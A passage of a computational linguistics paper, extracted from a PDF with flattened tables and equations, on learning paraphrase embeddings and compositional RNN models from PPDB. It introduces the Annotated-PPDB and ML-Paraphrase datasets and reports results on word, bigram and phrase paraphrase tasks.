suc- 3http://web.engr.illinois.edu/˜wieting2/ 4We also replicated this approach and found training to be time-consuming even using low-dimensional word vectors. 346 http://web.engr.illinois.edu/~wieting2/ cess using RNNs in a supervised setting, similar to Socher et al. (2014), who used RNNs to learn representations for image descriptions. The objec- tive function we used in this work was motivated by their multimodal objective function for learning joint image-sentence representations. Lastly, the PPDB has been used along with other resources to learn word embeddings for several tasks, including semantic similarity, language mod- eling, predicting human judgments, and classifica- tion (Yu and Dredze, 2014; Faruqui et al., 2015). Concurrently with our work, it has also been used to construct paraphrase models for short phrases (Yu and Dredze, 2015). 3 New Paraphrase Datasets We created two novel datasets: (1) Annotated- PPDB, a subset of phrase pairs from PPDB which are annotated according to how strongly they rep- resent a paraphrase relationship, and (2) ML- Paraphrase, a re-annotation of the bigram similarity dataset from Mitchell and Lapata (2010), again an- notated for strength of paraphrase relationship. 3.1 Annotated-PPDB Our motivation for creating Annotated-PPDB was to establish a way to evaluate compositional para- phrase models on short phrases. Most existing para- phrase tasks focus on words, like SimLex-999 (Hill et al., 2014b), or entire sentences, such as the Mi- crosoft Research Paraphrase Corpus (Dolan et al., 2004; Quirk et al., 2004). To our knowledge, there are no datasets that focus on the paraphrasability of short phrases. Thus, we created Annotated-PPDB so that researchers can focus on local compositional phenomena and measure the performance of models directly—avoiding the need to do so indirectly in a sentence-level task. Models that have strong perfor- mance on Annotated-PPDB can be used to provide more accurate confidence scores for the paraphrases in the PPDB as well as reduce the need for large paraphrase tables altogether. Annotated-PPDB was created in a multi-step pro- cess (outlined below) involving various automatic filtering steps followed by crowdsourced human an- notation. One of the aims for our dataset was to col- lect a variety of paraphrase types—we wanted to in- clude pairs that were non-trivial to recognize as well as those with a range of similarity and length. We fo- cused on phrase pairs with limited lexical overlap to avoid including those with only trivial differences. We started with candidate phrases extracted from the first 10M pairs in the XXL version of the PPDB and then executed the following steps.5 Filter phrases for quality: Only those phrases whose tokens were in our vocabulary were retained.6 Next, all duplicate paraphrase pairs were removed; in PPDB, these are distinct pairs that contain the same two phrases with the order swapped. Filter by lexical overlap: Next, we calculated the word overlap score in each phrase pair and then re- tained only those pairs that had a score of less than 0.5. By word overlap score, we mean the fraction of tokens in the smaller of the phrases with Leven- shtein distance ≤ 1 to a token in the larger of the phrases. This was done to exclude less interesting phrase pairs like 〈my dad had, my father had〉 or 〈ballistic missiles, of ballistic missiles〉 that only dif- fer in a synonym or the addition of a single word. Select range of paraphrasabilities: To balance our dataset with both clear paraphrases and erroneous pairs in PPDB, we sampled 5,000 examples from ten chunks of the first 10M initial phrase pairs where a chunk is defined as 1M phrase pairs. Select range of phrase lengths: We then selected 1,500 phrases from each 5000-example sample that encompassed a wide range of phrase lengths. To do this, we first binned the phrase pairs by their effec- tive size. Let n1 be the number of tokens of length greater than one character in the first phrase and n2 the same for the second phrase. Then the effective size is defined as max(n1,n2). The bins contained pairs of effective size of 3, 4, and 5 or more, and 500 pairs were selected from each bin. This gave us a total of 15,000 phrase pairs. Prune to 3,000: 3,000 phrase pairs were then se- lected randomly from the 15,000 remaining pairs to 5Note that the confidence scores for phrase pairs in PPDB are based on a weighted combination of features with weights determined heuristically. The confidence scores were used to place the phrase pairs into their respective sets (S, M, L, XL, XXL, etc.), where each larger set subsumes all smaller ones. 6Throughout, our vocabulary is defined as the most common 100K word types in English Wikipedia, following tokenization and lowercasing (see §5). 347 form an initial dataset, Annotated-PPDB-3K. The phrases were selected so that every phrase in the dataset was unique. Annotate with Mechanical Turk: The dataset was then rated on a scale from 1-5 using Amazon Me- chanical Turk, where a score of 5 denoted phrases that are equivalent in a large number of contexts, 3 meant that the phrases had some overlap in mean- ing, and 1 indicated that the phrases were dissimilar or contradictory in some way (e.g., can not adopt and is able to accept). We only permitted workers whose location was in the United States and who had done at least 1,000 HITS with a 99% acceptance rate. Each example was labeled by 5 annotators and their scores were averaged to produce the final rating. Table 1 shows some statistics of the data. Overall, the annotated data had a mean deviation (MD)7 of 0.80. Table 1 shows that overall, workers found the phrases to be of high quality, as more than two-thirds of the pairs had an average score of at least 3. Also from the Ta- ble, we can see that workers had stronger agreement on very low and very high quality pairs and were less certain in the middle of the range. Prune to 1,260: To create our final dataset, Annotated-PPDB, we selected 1,260 phrase pairs from the 3,000 annotations. We did this by first bin- ning the phrases into 3 categories: those with scores in the interval [1,2.5), those with scores in the in- terval [2.5,3.5], and those with scores in the interval (3.5,5]. We took the 420 phrase pairs with the low- est MD in each bin, as these have the most agree- ment about their label, to form Annotated-PPDB. These 1,260 examples were then randomly split into a development set of 260 examples and a test set of 1,000 examples. The development set had an MD of 0.61 and the test set had an MD of 0.60, indicating the final dataset had pairs of higher agreement than the initial 3,000. 3.2 ML-Paraphrase Our second newly-annotated dataset, ML- Paraphrase, is based on the bigram similarity task originally introduced by Mitchell and Lapata 7MD is similar to standard deviation, but uses absolute value instead of squared value and thus is both more intuitive and less sensitive to outliers. Score Range MD % of Data [1,2) 0.66 8.1 [2,3) 1.05 20.0 [3,4) 0.93 34.9 [4,5] 0.59 36.9 Table 1: An analysis of Annotated-PPDB-3K extracted from PPDB. The statistics shown are for the splits of the data accord- ing to the average score by workers. MD denotes mean devia- tion and % of Data refers to the percentage of our dataset that fell into each range. (2010); we refer to the original annotations as the ML dataset. The ML dataset consists of human similarity rat- ings for three types of bigrams: adjective-noun (JN), noun-noun (NN), and verb-noun (VN). Through manual inspection, we found that the annotations were not consistent with the notion of similarity central to paraphrase tasks. For instance, television set and television programme were the highest rated phrases in the NN section (based on average anno- tator score). Similarly, one of the highest ranked JN pairs was older man and elderly woman. This indi- cates that the annotations reflect topical similarity in addition to capturing functional or definitional simi- larity. Therefore, we had the data re-annotated by two authors of this paper who are native English speak- ers.8 The bigrams were labeled on a scale from 1- 5 where 5 denotes phrases that are equivalent in a large number of contexts, 3 indicates the phrases are roughly equivalent in a narrow set of contexts, and 1 means the phrases are not at all equivalent in any context. Following annotation, we collapsed the rat- ing scale by merging 4s and 5s together and 1s and 2s together. Data IA ρ IA κ ML comp. ρ ML Human ρ JN 0.87 0.79 0.56 0.52 NN 0.64 0.58 0.38 0.49 VN 0.73 0.73 0.55 0.55 Table 2: Inter-annotator agreement of ML-Paraphrase and com- parison with ML dataset. Columns 2 and 3 show the inter- annotator agreement between the two annotators measured with Spearman ρ and Cohen’s κ. Column 4 shows the ρ between ML-Paraphrase and all of the ML dataset. The last column is the average human ρ on the ML dataset. 8We tried using Mechanical Turk here, but due to such short phrases, with few having the paraphrase relationship, workers did not perform well on the task. 348 Statistics for the data are shown in Table 2. We show inter-annotator Spearman ρ and Cohen’s κ in columns 2 and 3, indicating substantial agreement on the JN and VN portions but only moderate agree- ment on NN. In fact, when evaluating our NN an- notations against those from the original ML data (column 4), we find ρ to be 0.38, well below the av- erage human correlation of 0.49 (final column) re- ported by Mitchell and Lapata and also surpassed by pointwise multiplication (Mitchell and Lapata, 2010). This suggests that the original NN portion, more so than the others, favored a notion of similar- ity more related to association than paraphrase. 4 Paraphrase Models We now present parametric paraphrase models and discuss training. Our goal is to embed phrases into a low-dimensional space such that cosine similarity in the space corresponds to the strength of the para- phrase relationship between phrases. We use a recursive neural network (RNN) similar to that used by Socher et al. (2014). We first use a constituent parser to obtain a binarized parse of a phrase. For phrase p, we compute its vector g(p) through recursive computation on the parse. That is, if phrase p is the yield of a parent node in a parse tree, and phrases c1 and c2 are the yields of its two child nodes, we define g(p) recursively as follows: g(p) = f(W [g(c1);g(c2)] + b) where f is an element-wise activation function (tanh), [g(c1);g(c2)] ∈ R2n is the concatenation of the child vectors, W ∈ Rn×2n is the composi- tion matrix, b ∈ Rn is the offset, and n is the di- mensionality of the word embeddings. If node p has no children (i.e., it is a single token), we define g(p) = W (p) w , where Ww is the word embedding matrix in which particular word vectors are indexed using superscripts. The trainable parameters of the model are W , b, and Ww. 4.1 Objective Functions We now present objective functions for training on pairs extracted from PPDB. The training data con- sists of (possibly noisy) pairs taken directly from the original PPDB. In subsequent sections, we discuss how we extract training pairs for particular tasks. We assume our training data consists of a set X of phrase pairs 〈x1,x2〉, where x1 and x2 are assumed to be paraphrases. To learn the model parame- ters (W,b,Ww), we minimize our objective function over the data using AdaGrad (Duchi et al., 2011) with mini-batches. The objective function follows: min W,b,Ww 1 |X| ( ∑ 〈x1,x2〉∈X max(0,δ −g(x1) ·g(x2) + g(x1) ·g(t1)) + max(0,δ −g(x1) ·g(x2) + g(x2) ·g(t2)) ) + λW (‖W‖2 +‖b‖2) + λWw ‖Wwinitial −Ww‖ 2 (1) where λW and λWw are regularization parameters, Wwinitial is the initial word embedding matrix, δ is the margin (set to 1 in all of our experiments), and t1 and t2 are carefully-selected negative examples taken from a mini-batch during optimization. The intuition for this objective is that we want the two phrases to be more similar to each other (g(x1) ·g(x2)) than either is to their respective neg- ative examples t1 and t2, by a margin of at least δ. Selecting Negative Examples To select t1 and t2 in Eq. 1, we simply chose the most similar phrase in the mini-batch (other than those in the given phrase pair). E.g., for choosing t1 for a given 〈x1,x2〉: t1 = argmax t:〈t,·〉∈Xb\{〈x1,x2〉} g(x1) ·g(t) where Xb ⊆ X is the current mini-batch. That is, we want to choose a negative example ti that is sim- ilar to xi according to the current model parameters. The downside of this approach is that we may oc- casionally choose a phrase ti that is actually a true paraphrase of xi. We also tried a strategy in which we selected the least similar phrase that would trig- ger an update (i.e., g(ti)·g(xi) > g(x1)·g(x2)−δ), but we found the simpler strategy above to work bet- ter and used it for all experiments reported below. Discussion The objective in Eq. 1 is similar to one used by Socher et al. (2014), but with several differ- ences. Their objective compared text and projected images. They also did not update the underlying word embeddings; we do so here, and in a way such 349 that they are penalized from deviating from their ini- tialization. Also for a given 〈x1,x2〉, they do not select a single t1 and t2 as we do, but use the en- tire training set, which can be very expensive with a large training dataset. We also experimented with a simpler objective that sought to directly minimize the squared L2- norm between g(x1) and g(x2) in each pair, along with the same regularization terms as in Eq. 1. One problem with this objective function is that the global minimum is 0 and is achieved simply by driv- ing the parameters to 0. We obtained much better results using the objective in Eq. 1. Training Word Paraphrase Models To train just word vectors on word paraphrase pairs (again from PPDB), we used the same objective function as above, but simply dropped the composition terms. This gave us an objective that bears some similarity to the skip-gram objective with negative sampling in word2vec (Mikolov et al., 2013a). Both seek to maximize the dot products of certain word pairs while minimizing the dot products of others. This objective function is: min Ww 1 |X| ( ∑ 〈x1,x2〉∈X max(0,δ −W(x1)w ·W(x2)w + W(x1)w ·W(t1)w ) + max(0,δ −W(x1)w ·W(x2)w + W(x2)w ·W(t2)w ) ) + λWw ‖Wwinitial −Ww‖ 2 (2) It is like Eq. 1 except with word vectors replacing the RNN composition function and with the regular- ization terms on the W and b removed. We further found we could improve this model by incorporating constraints. From our training pairs, for a given word w, we assembled all other words that were paired with it in PPDB and all of their lem- mas. These were then used as constraints during the pairing process: a word t could only be paired with w if it was not in its list of assembled words. 5 Experiments – Word Paraphrasing We first present experiments on learning lexical paraphrasability. We train on word pairs from PPDB and evaluate on the SimLex-999 dataset (Hill et al., 2014b), achieving the best results reported to date. 5.1 Training Procedure To learn word vectors that reflect paraphrasability, we optimized Eq. 2. There are many tunable hyper- parameters with this objective, so to make training tractable we fixed the initial learning rates for the word embeddings to 0.5 and the margin δ to 1. Then we did a coarse grid search over a parameter space for λWw and the mini-batch size. We considered λWw values in {10−2,10−3, ...,10−7,0} and mini- batch sizes in {100, 250, 500, 1000}. We trained for 20 epochs for each set of hyperparameters using AdaGrad (Duchi et al., 2011). For all experiments, we initialized our word vectors with skip-gram vectors trained using word2vec (Mikolov et al., 2013a). The vectors were trained on English Wikipedia (tokenized and lowercased, yielding 1.8B tokens).9 We used a window size of 5 and a minimum count cut-off of 60, producing vectors for approximately 270K word types. We retained vectors for only the 100K most frequent words, averaging the rest to obtain a single vector for unknown words. We will refer to this set of the 100K most frequent words as our vocabulary. 5.2 Extracting Training Data For training, we extracted word pairs from the lexi- cal XL section of PPDB. We used the XL data for all experiments, including those for phrases. We used XL instead of XXL because XL has better qual- ity overall while still being large enough so that we could be selective in choosing training pairs. There are a total of 548,085 pairs. We removed 174,766 that either contained numerical digits or words not in our vocabulary. We then removed 260,425 re- dundant pairs, leaving us with a final training set of 112,894 word pairs. 5.3 Tuning and Evaluation Hyperparameters were tuned using the wordsim-353 (WS353) dataset (Finkelstein et al., 2001), specifi- cally its similarity (WS-S) and relatedness (WS-R) partitions (Agirre et al., 2009). In particular, we tuned to maximize 2×WS-S correlation minus the WS-R correlation. The idea was to reward vectors with high similarity and relatively low relatedness, in order to target the paraphrase relationship. 9We used the December 2, 2013 snapshot. 350 Model n SL999 ρ skip-gram 25 0.21 skip-gram 1000 0.38 PARAGRAM WS 25 0.56∗ + constraints 25 0.58∗ Hill et al. (2014b) 200 0.446 Hill et al. (2014a) - 0.52 inter-annotator agreement N/A 0.67 Table 3: Results on the SimLex-999 (SL999) word similarity task obtained by performing hyperparameter tuning based on 2×WS-S −WS-R and treating SL999 as a held-out test set. n is word vector dimensionality. A ∗ indicates statistical signifi- cance (p < 0.05) over the 1000-dimensional skip-gram vectors. After tuning, we evaluated the best hyperparame- ters on the SimLex-999 (SL999) dataset (Hill et al., 2014b). We chose SL999 as our primary test set as it most closely evaluates the paraphrase relationship. Even though WS-S is a close approximation to this relationship, it does not include pairs that are merely associated and assigned low scores, which SL999 does (see discussion in Hill et al., 2014b). Note that for all experiments we used cosine sim- ilarity as our similarity metric and evaluated the sta- tistical significance of dependent correlations using the one-tailed method of (Steiger, 1980). 5.4 Results Table 3 shows results on SL999 when improving the initial word vectors by training on word pairs from PPDB, both with and without constraints. The “PARAGRAM WS” rows show results when tuning to maximize 2×WS-S − WS-R. We also show results for strong skip-gram baselines and the best results from the literature, including the state-of-the-art re- sults from Hill et al. (2014a) as well as the inter- annotator agreement from Hill et al. (2014b).10 The table illustrates that, by training on PPDB, we can surpass the previous best correlations on SL999 by 4-6% absolute, achieving the best results reported to date. We also find that we can train low-dimensional word vectors that exceed the per- formance of much larger vectors. This is very use- ful as using large vectors can increase both time and memory consumption in NLP applications. To generate word vectors to use for downstream 10Hill et al. (2014a) did not report the dimensionality of the vectors that led to their state-of-the-art results. applications, we chose hyperparameters so as to maximize performance on SL999.11 These word vectors, which we refer to as PARAGRAM vectors, had a ρ of 0.57 on SL999. We use them as initial word vectors for the remainder of the paper. 5.5 Sentiment Analysis As an extrinsic evaluation of our PARAGRAM word vectors, we used them in a convolutional neural network (CNN) for sentiment analysis. We used the simple CNN from Kim (2014) and the binary sentence-level sentiment analysis task from Socher et al. (2013). We used the standard data splits, re- moving examples with a neutral rating. We trained on all constituents in the training set while only us- ing full sentences from development and test, giving us train/development/test sizes of 67,349/872/1,821. The CNN uses m-gram filters, each of which is an m×n vector. The CNN computes the inner product between an m-gram filter and each m-gram in an example, retaining the maximum match (so-called “max-pooling”). The score of the match is a single dimension in a feature vector for the example, which is then associated with a weight in a linear classifier used to predict positive or negative sentiment. While Kim (2014) used m-gram filters of sev- eral lengths, we only used unigram filters. We also fixed the word vectors during learning (called “static” by Kim). After learning, the unigram fil- ters correspond to locations in the fixed word vec- tor space. The learned classifier weights represent how strongly each location corresponds to positive or negative sentiment. We expect this static CNN to be more effective if the word vector space separates positive and negative sentiment. In our experiments, we compared baseline skip- gram embeddings to our PARAGRAM vectors. We used AdaGrad learning rate of 0.1, mini-batches of size 10, and a dropout rate of 0.5. We used 200 un- igram filters and rectified linear units as the activa- tion (applied to the filter output + filter bias). We trained for 30 epochs, predicting labels on the de- velopment set after each set of 3,000 examples. We recorded the highest development accuracy and used those parameters to predict labels on the test set. Results are shown in Table 4. We see improve- 11We did not use constraints during training. 351 word vectors n accuracy (%) skip-gram 25 77.0 skip-gram 50 79.6 PARAGRAM 25 80.9 Table 4: Test set accuracies when comparing embeddings in a static CNN on the binary sentiment analysis task from Socher et al. (2013). ments over the baselines when using PARAGRAM vectors, even exceeding the performance of higher- dimensional skip-gram vectors. 6 Experiments – Compositional Paraphrasing In this section, we describe experiments on a variety of compositional phrase-based paraphrasing tasks. We start with the simplest case of bigrams, and then proceed to short phrases. For all tasks, we again train on appropriate data from PPDB and test on various evaluation datasets, including our two novel datasets (Annotated-PPDB and ML-Paraphrase). 6.1 Training Procedure We trained our models by optimizing Eq. 1 using AdaGrad (Duchi et al., 2011). We fixed the initial learning rates to 0.5 for the word embeddings and 0.05 for the composition parameters, and the mar- gin to 1. Then we did a coarse grid search over a parameter space for λWw , λW , and mini-batch size. For λWw , our search space again consisted of {10−2,10−3, ...,10−7,0}, for λW it was {10−1,10−2,10−3,0}, and we explored batch sizes of {100, 250, 500, 1000, 2000}. When ini- tializing with PARAGRAM vectors, the search space for λWw was shifted upwards to be {10,1,10−1,10−3, ...,10−6} to reflect our in- creased confidence in the initial vectors. We trained only for 5 epochs for each set of parameters. For baselines, we used the same initial skip-gram vectors as in Section 5. 6.2 Evaluation and Baselines For all experiments, we again used cosine similarity as our similarity metric and evaluated the statistical significance using the method of (Steiger, 1980). A baseline used in all compositional experiments is vector addition of skip-gram (or PARAGRAM) word vectors. Unlike explicit word vectors, where point-wise multiplication acts as a conjunction of features and performs well on composition tasks (Mitchell and Lapata, 2008), using addition with skip-gram vectors (Mikolov et al., 2013b) gives bet- ter performance than multiplication. 6.3 Bigram Paraphrasability To evaluate our ability to paraphrase bigrams, we consider the original bigram similarity task from Mitchell and Lapata (2010) as well as our newly- annotated version of it: ML-Paraphrase. Extracting Training Data Training data for these tasks was extracted from the XL portion of PPDB. The bigram similarity task from Mitchell and Lapata (2010) contains three types of bigrams: adjective- noun (JN), noun-noun (NN), and verb-noun (VN). We aimed to collect pairs from PPDB that mirrored these three types of bigrams. We found parsing to be unreliable on such short segments of text, so we used a POS tagger (Man- ning et al., 2014) to tag the tokens in each phrase. We then used the word alignments in PPDB to ex- tract bigrams for training. For JN and NN, we ex- tracted pairs containing aligned, adjacent tokens in the two phrases with the appropriate part-of-speech tag. Thus we extracted pairs like 〈easy job, simple task〉 for the JN section and 〈town meeting, town council〉 for the NN section. We used a different strategy for extracting training data for the VN sub- set: we took aligned VN tokens and took the closest noun after the verb. This was done to approximate the direct object that would have been ideally ex- tracted with a dependency parse. An example from this section is 〈achieve goal, achieve aim〉. We removed phrase pairs that (1) contained words not in our vocabulary, (2) were redundant with oth- ers, (3) contained brackets, or (4) had Levenshtein distance ≤ 1. The final criterion helps to ensure that we train on phrase pairs with non-trivial differences. The final training data consisted of 133,997 JN pairs, 62,640 VN pairs and 35,601 NN pairs. Baselines In addition to RNN models, we report baselines that use vector addition as the composition function, both with our skip-gram embeddings and PARAGRAM embeddings from Section 5. We also compare to several results from prior work. When doing so, we took their best correla- 352 Model Mitchell and Lapata (2010) Bigrams ML-Paraphrase word vectors n comp. JN NN VN Avg JN NN VN Avg skip-gram 25 + 0.36 0.44 0.36 0.39 0.32 0.35 0.42 0.36 PARAGRAM 25 + 0.44∗ 0.34 0.48∗ 0.42 0.50∗ 0.29 0.58∗‡ 0.46 PARAGRAM 25 RNN 0.51∗† 0.40† 0.50∗‡ 0.47 0.57∗‡ 0.44† 0.55∗ 0.52 Hashimoto et al. (2014) 0.49 0.45 0.46 0.47 0.38 0.39 0.45 0.41 Mitchell and Lapata (2010) 0.46 0.49 0.38 0.44 - - - - Human - - - - 0.87 0.64 0.73 0.75 Table 5: Results on the test section of the bigram similarity task of Mitchell and Lapata (2010) and our newly annotated version (ML-Paraphrase). (n) shows the word vector dimensionality and (“comp.”) shows the composition function used: “+” is vector addition and “RNN” is the recursive neural network. The * indicates statistically significant (p < 0.05) over the skip-gram model, † statistically significant over the {PARAGRAM, +} model, and ‡ statistically significant over Hashimoto et al. (2014). tions for each data subset. That is, the JN and NN results from Mitchell and Lapata (2010) use their multiplicative model and the VN results use their di- lation model. From Hashimoto et al. (2014) we used their PAS-CLBLM Addl and PAS-CLBLM Addnl models. We note that their vector dimensionalities are larger than ours, using n = 2000 and 50 respec- tively. Results Results are shown in Table 5. We re- port results on the test portion of the original Mitchell and Lapata (2010) dataset (ML) as well as the entirety of our newly-annotated dataset (ML- Paraphrase). RNN results on ML were tuned on the respective development sections and RNN results on ML-Paraphrase were tuned on the entire ML dataset. Our RNN model outperforms results from the lit- erature on most sections in both datasets and its av- erage correlations are among the highest.12 The one subset of the data that posed difficulty was the NN section of the ML dataset. We suspect this is due to the reasons discussed in Section 3.2; for our ML- Paraphrase dataset, by contrast, we do see gains on the NN section. We also outperform the strong baseline of adding 1000-dimensional skip-gram embeddings, a model with 40 times the number of parameters, on our ML- Paraphrase dataset. This baseline had correlations of 0.45, 0.43, and 0.47 on the JN, NN, and VN parti- tions, with an average of 0.45—below the average ρ of the RNN (0.52) and even the {PARAGRAM, +} model (0.46). 12The results obtained here differ from those reported in Hashimoto et al. (2014) as we scored their vectors with a newer Python implementation of Spearman ρ that handles ties (Hashimoto, P.C.). Interestingly, the type of vectors used to initial- ize the RNN has a significant effect on performance. If we initialize using the 25-dimensional skip-gram vectors, the average ρ on ML-Paraphrase drops to 0.43, below even the {PARAGRAM, +} model. 6.4 Phrase Paraphrasability In this section we show that by training a model based on filtered phrase pairs in PPDB, we can ac- tually distinguish between quality paraphrases and poor paraphrases in PPDB better than the original heuristic scoring scheme from Ganitkevitch et al. (2013). Extracting Training Data As before, training data was extracted from the XL section of PPDB. Similar to the procedure to create our Annotated- PPDB dataset, phrases were filtered such that only those with a word overlap score of less than 0.5 were kept. We also removed redundant phrases and phrases that contained tokens not in our vocabulary. The phrases were then binned according to their ef- fective size and 20,000 examples were selected from bins of effective sizes of 3, 4, and more than 5, cre- ating a training set of 60,000 examples. Care was taken to ensure that none of our training pairs was also present in our development and test sets. Baselines We compare our models with strong lexical baselines. The first, strict word overlap, is the percentage of words in the smaller phrase that are also in the larger phrase. We also include a ver- sion where the words are lemmatized prior to the calculation. We also train a support vector regression model (epsilon-SVR) (Chang and Lin, 2011) on the 33 fea- tures that are included for each phrase pair in PPDB. 353 We scaled the features such that each lies in the in- terval [−1,1] and tuned the parameters using 5-fold cross validation on our dev set.13 We then trained on the entire dev set after finding the best performing C and � combination and evaluated on the test set of Annotated-PPDB. Model word vectors n comp. Annotated-PPDB skip-gram 25 + 0.20 PARAGRAM 25 + 0.32∗ PARAGRAM 25 RNN 0.40∗†‡ Ganitkevitch et al. (2013) 0.25 word overlap (strict) 0.26 word overlap (lemmatized) 0.20 PPDB+SVR 0.33 Table 6: Spearman correlation on Annotated-PPDB. The * indicates statistically significant (p < 0.05) over the skip- gram model, the † indicates statistically significant over the {PARAGRAM, +} model, and the ‡ indicates statistically sig- nificant over PPDB+SVR. Results We evaluated on our Annotated-PPDB dataset described in §3.1. Table 6 shows the Spear- man correlations on the 1000-example test set. RNN models were tuned on the development set of 260 examples. All other methods had no hyperparame- ters and therefore required no tuning. We note that the confidence estimates from Gan- itkevitch et al. (2013) reach a ρ of 0.25 on the test set, similar to the results of strict overlap. While 25- dimensional skip-gram embeddings only reach 0.20, we can improve this to 0.32 by fine-tuning them us- ing PPDB (thereby obtaining our PARAGRAM vec- tors). By using the PARAGRAM vectors to initialize the RNN, we reach a correlation of 0.40, which is better than the PPDB confidence estimates by 15% absolute. We again consider addition of 1000-dimensional skip-gram embeddings as a baseline, and they con- tinue to perform strongly (ρ = 0.37). The RNN ini- tialized with PARAGRAM vectors does reach a higher ρ (0.40), but the difference is not statistically signif- icant (p = 0.16). Thus we can achieve similarly- strong results with far fewer parameters. This task also illustrates the importance of initial- izing our RNN model with appropriate word embed- dings. An RNN initialized with skip-gram vectors 13We tuned both parameters over {2−10,2−9, ...,210}. has a modest ρ of 0.22, well below the ρ of the RNN initialized with PARAGRAM vectors. Clearly, ini- tialization is important when optimizing non-convex objectives like ours, but it is noteworthy that our best results came from first improving the word vectors and then learning the composition model, rather than jointly learning both from scratch. 7 Qualitative Analysis Score Range + RNN [1,2) 2.35 2.08 [2,3) 1.56 1.38 [3,4) 0.87 0.85 [4,5] 0.43 0.47 Table 7: Average absolute error of addition and RNN models on different ranges of gold scores. We performed a qualitative analysis to uncover sources of error and determine differences between adding PARAGRAM vectors and using an RNN ini- tialized with them. To do so, we took the output of both systems on Annotated-PPDB and mapped their cosine similarities to the interval [1,5]. We then computed their absolute error as compared to the gold ratings. Table 7 shows how the average of these absolute errors changes with the magnitude of the gold rat- ings. The RNN performs better (has lower average absolute error) for less similar pairs. Vector addi- tion only does better on the most similar pairs. This is presumably because the most positive pairs have high word overlap and so can be represented effec- tively with a simpler model. To further investigate the differences between these models, we removed those pairs with gold scores in [2,4], in order to focus on pairs with ex- treme scores. We identified two factors that dis- tinguished the performance between the two mod- els: length ratio and the amount of lexical overlap. We did not find evidence that non-compositional phrases, such as idioms, were a source of error as these were not found in ML-Paraphrase and only ap- pear rarely in Annotated-PPDB. We define length ratio as simply the number of tokens in the smaller phrase divided by the number of tokens in the larger phrase. Overlap ratio is the number of equivalent tokens in the phrase pair di- 354 Index Phrase 1 Phrase 2 Length Ratio Overlap Ratio Gold RNN + 1 scheduled to be held in that will take place in 1.0 0.4 4.6 2.9 4.4 2 according to the paper , the newspaper reported that 0.8 0.5 4.6 2.8 4.1 3 at no cost to without charge to 0.75 1.0 4.8 3.1 4.6 4 ’s surname family name of 0.67 1.0 4.4 2.8 4.1 5 could have an impact on may influence 0.4 0.5 4.6 4.2 3.2 6 to participate actively to play an active role 0.6 0.67 5.0 4.8 4.0 7 earliest opportunity early as possible 0.67 0.0 4.4 4.3 2.9 8 does not exceed is no more than 0.75 0.0 5.0 4.8 3.5 Table 8: Illustrative phrase pairs from Annotated-PPDB with gold similarity > 4. The last three columns show the gold similarity score, the similarity score of the RNN model, and the similarity score of vector addition. We note that addition performs better when the pairs have high length ratio (rows 1–2) or overlap ratio (rows 3–4) while the RNN does better when those values are low (rows 5–6 and 7–8 respectively). Boldface indicates smaller error compared to gold scores. vided by the number of tokens in the smaller of the two phrases. Equivalent tokens are defined as to- kens that are either exact matches or are paired up in the lexical portion of PPDB used to train the PARA- GRAM vectors. Table 9 shows how the performance of the mod- els changes under different values of length ratio and overlap ratio.14 The values in this table are the per- centage changes in absolute error when using the RNN over the PARAGRAM vector addition model. So negative values indicate superior performance by the RNN. Length Ratio [0,0.6] (0.6,0.8] (0.8,1] Positive Examples -22.4 10.0 35.5 Negative Examples -9.9 -11.1 -12.2 Both -13.0 -6.4 -2.0 Overlap Ratio [0, 1 3 ] ( 1 3 , 2 3 ] ( 2 3 ,1] Positive Examples -4.5 7.0 19.4 Negative Examples -11.3 -7.5 -15.0 Both -10.6 -5.3 0.0 Table 9: Comparison of the addition and RNN model on phrase pairs of different overlap and length ratios. The values in the table are the percent change in absolute error from the addition model to the RNN model. Negative examples are defined as pairs from Annotated-PPDB whose gold score is less than 2 and positive examples are those with scores greater than 4. “Both” refers to both negative and positive examples. A few trends emerge from this table. One is that as the length ratio increases (i.e., the phrase pairs are closer in length), addition surpasses the RNN for positive examples. For negative examples, the 14The bin delimiters were chosen to be uniform over the range of output values of the length ratio ([0.4,1] with one out- lier data point removed) and overlap ratio ([0,1]). trend is reversed. The same trend appears for over- lap ratio. Examples from Annotated-PPDB illustrat- ing these trends on positive examples are shown in Table 8. When considering both positive and negative ex- amples (“Both”), we see that the RNN excels on the most difficult examples (large differences in phrase length and less lexical overlap). For easier exam- ples, the two fare similarly overall (-2.0 to 0.0% change), but the RNN does much better on nega- tive examples. This aligns with the intuition that addition should perform well when two paraphrastic phrases have high lexical overlap and similar length. But when they are not paraphrases, simple addition is misled and the RNN’s learned composition func- tion better captures the relationship. This may sug- gest new architectures for modeling composition- ality differently depending on differences in length and amount of overlap. 8 Conclusion We have shown how to leverage PPDB to learn state-of-the-art word embeddings and compositional models for paraphrase tasks. Since PPDB was cre- ated automatically from parallel corpora, our models are also built automatically. Only small amounts of annotated data are used to tune hyperparameters. We also introduced two new datasets to evaluate compositional models of short paraphrases15, fill- ing a gap in the NLP community, as currently there are no datasets created for this purpose. Successful models on these datasets can then be used to extend the coverage of, or provide an alternative to, PPDB. 15http://web.engr.illinois.edu/˜wieting2/ 355 http://web.engr.illinois.edu/~wieting2/ There remains a great deal of work to be done in developing new composition models, whether with new network architectures or distance functions. In this work, we based our composition function on constituent parse trees, but this may not be the best approach—especially for short phrases. Depen- dency syntax may be a better alternative (Socher et al., 2014). Besides improving composition, another direction to explore is how to use models for short phrases in sentence-level paraphrase recognition and other downstream tasks. Acknowledgements We thank the editor and the anonymous reviewers as well as Juri Ganitkevitch, Dan Roth, Weiran Wang, and Kazuma Hashimoto for their valuable com- ments and technical assistance. We also thank Chris Callison-Burch, Dipanjan Das, Kuzman Ganchev, Ellie Pavlick, Slav Petrov, Owen Rambow, David Sontag, Oscar Täckström, Kapil Thadani, Lyle Un- gar, Benjamin Van Durme, and Mo Yu for helpful conversations. References Eneko Agirre, Enrique Alfonseca, Keith Hall, Jana Kravalova, Marius Paşca, and Aitor Soroa. 2009. A study on similarity and relatedness using distributional and wordnet-based approaches. In Proceedings of Hu- man Language Technologies: The 2009 Annual Con- ference of the North American Chapter of the Associa- tion for Computational Linguistics, pages 19–27. As- sociation for Computational Linguistics. Ion Androutsopoulos and Prodromos Malakasiotis. 2010. A survey of paraphrasing and textual entailment methods. Journal of Artificial Intelligence Research, pages 135–187. Colin Bannard and Chris Callison-Burch. 2005. Para- phrasing with bilingual parallel corpora. In Proceed- ings of the 43rd Annual Meeting on Association for Computational Linguistics, pages 597–604. Associa- tion for Computational Linguistics. Mohit Bansal, Kevin Gimpel, and Karen Livescu. 2014. Tailoring continuous word representations for depen- dency parsing. In Proceedings of the Annual Meeting of the Association for Computational Linguistics. Marco Baroni and Roberto Zamparelli. 2010. Nouns are vectors, adjectives are matrices: Representing adjective-noun constructions in semantic space. In Proceedings of the 2010 